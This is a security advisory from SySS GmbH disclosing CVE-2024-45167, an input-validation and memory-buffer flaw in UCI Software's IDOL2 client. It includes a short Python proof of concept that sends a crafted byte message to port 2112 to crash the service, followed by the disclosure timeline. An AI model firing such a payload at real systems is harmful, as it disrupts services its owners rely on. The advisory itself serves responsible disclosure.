-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-051 Product: IDOL2 (uciIDOL) Manufacturer: UCI Software GmbH Affected Version(s): ≤ 2.12 Tested Version(s): 2.12 Vulnerability Type: Improper Input Validation (CWE-20), Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-06-26 Solution Date: Public Disclosure: 2024-08-19 CVE Reference: CVE-2024-45167 Authors of Advisory: Ludwig Stage, Manuel Stotz, Moritz Lottermann, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: IDOL2 is a so-called rich client application for uciIDOL and seems to be able to provide different functionality, e.g. personnel time recording. The manufacturer describes the product as follows (see [1]): "Die uciIDOL-Produktfamilie umfasst modular einsetzbare Anwendungen für die Bereiche der Personalzeit- und Betriebsdatenerfassung sowie für die Zutrittskontrolle und Warenwirtschaft. Innerhalb dieser Hauptgruppen bieten wir Ihnen zahlreiche Funktionsbausteine, um Ihnen ein auf Ihre Bedürfnisse angepasstes System zu ermöglichen. Nach Bedarf können Sie diese durch die einzeln wählbare Module des idolWEB ergänzen. Die webbasierten Anwendungen bieten Ihnen flexibel einsetzbare Erweiterungen und zusätzliche Möglichkeiten im Umgang mit den uciIDOL-Anwendungen." Due to improper input validation, improper deserialization and improper restriction of operations within the bounds of a memory buffer, IDOL2 is vulnerable to denial-of-service (DoS) attacks and possibly remote code execution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): #!/usr/bin/env python3 import socket HOST = "127.0.0.1" PORT = 2112 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.settimeout(None) MESSAGE=b'\xB0\x00' + b' EOF' print("Send message: " + str(MESSAGE)) s.send(MESSAGE) s.close() ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-06-26: Vulnerability reported to manufacturer 2024-06-26: Queries by the manufacturer about the circumstances under which the vulnerability was discovered 2024-06-27: Answers given to manufacturer and an offer to talk 2024-06-27: Invitation to a discussion with manufacturer 2024-07-03: Rejection of the offer to a call by the manufacturer 2024-08-12: Advisories sent to the manufacturer prior to publication 2024-08-19: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for uciIDOL https://uci.de/products/index.html [2] SySS Security Advisory SYSS-2024-051 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-051.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] IDOL2 client download site https://uci.de/download/idol2-client.html [5] IDOL2 client binary download http://download.uci.de/idol2/idol2Client_2_12.exe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Ludwig Stage, Manuel Stotz and Moritz Lottermann of SySS GmbH. E-Mail: ludwig.stage@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Ludwig_Stage.asc Key Fingerprint: C2FF F40D FC78 791E EF81 20DF 4B57 48C9 53A5 EE5E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwv/0Dfx4eR7vgSDfS1dIyVOl7l4FAmbG7McACgkQS1dIyVOl 7l71oQ/9EkTrbngerhFXcIadkckYirDJiKgndbojSsqUFgsdOR+Mlrv0Narr4nZ+ 8x1w7/nw2tqYAPTZIOEoZi/CwHg069Y2lnIRq82DVY/St6dz52TmRAJ/hhQKEJVi 2qqJKbsI39hnkofaFClnKj6sh5m97REdNuouRzgYu5c5RVFVBM2iZvMyfyJfZzPd bLlAXMCZBI+G6w9O0DBkUJJQdCKsCVMUW8SUuaVFL7C/wlfMaIN0rcTw+GOoZPWi 6iCdFltD9aHtL1vBQG9ZM/oWrYhC/A5hjbANH25NS6bD3RTdIRe89qtBYsEnsfaF EgYYG3x0yE/WsEZjMtfyXo8Zp630lR2OQjiSmQmc9P4gFIqF4mEeYW16XAps3aGS T4MLIbfR//tLokx0gTy9ZhzQnyUDZ9Bh9Ar6PRSNddDIkUT6dT+MPyHbqK9cgTu5 l7zkonS3Ck0NPsqIiptaFNAIvrE0SCPy0yVF/Tq9oDEO40tawVmzjIJb4iHEYqqn eW8dINZp70CvuVviWy+kAAmy8XBpzqPaW3gUacFflFB0OK7/zEVleOovtHVRMlW8 Dilh7lQsz4At//ZXXFCGfko3ZNVqTURLmKMjiq+ej8xBO5XPXJHlt0PycDGs11QO XfU22oajzavkpU5a7xaBUOWUaVHvfm5ANZhXJk6vUFQECVlbPpQ= =SORl -----END PGP SIGNATURE-----